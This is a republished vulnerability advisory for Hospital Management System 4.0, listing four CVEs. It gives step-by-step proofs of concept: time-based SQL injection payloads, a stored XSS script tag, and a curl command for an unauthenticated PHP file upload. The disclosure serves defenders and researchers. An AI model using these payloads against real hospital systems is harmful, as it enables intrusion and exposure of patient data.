Advertisement






Hospital Management System 4.0 XSS / Shell Upload / SQL Injection

CVE Category Price Severity
CVE-2020-26627 CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')) N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-24
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120042

Below is a copy:

Hospital Management System 4.0 XSS / Shell Upload / SQL Injection
Description: Mutiple vulnerabilties were discovered in Hospital Management System
Affected CMS: Hospital Management System
Affected Version: <= 4.0
CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630
CVSS Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd

Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.
Proof of Concept:
Attack Vector 1 (Time-Based SQL injection):
Step 1.) Login admin
Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit
Step 3.) Replace the POST body to below payload and server will respond after 5 second.
adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=

Attack Vector 2 (Time-Based SQL injection):
Step 1.) Login admin
Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit
Step 3.) Replace the POST body to below payload and server will respond after 5 second.
doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=

Attack Vector 3 (Cross Site Scripting (XSS)):
After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.
Step 1.) Login patient page
Step 2.) Got to My Profile>Edit Profile.
Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save
Step 4.) Other user visit this profile will trigger xss

Attacker Vector 4 (Unauthenticated Arbitrary File Upload):
The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.
Step 1.) upload file with below curl command:
curl -i -s -k -X $'POST' \
    -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \
    --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \
    $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'
Step 2.) visit the url in response and trigger the php file.



Recommendation
Update to v5.2.0

https://phpgurukul.com/contact-us/
https://phpgurukul.com/hospital-management-system-in-php

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum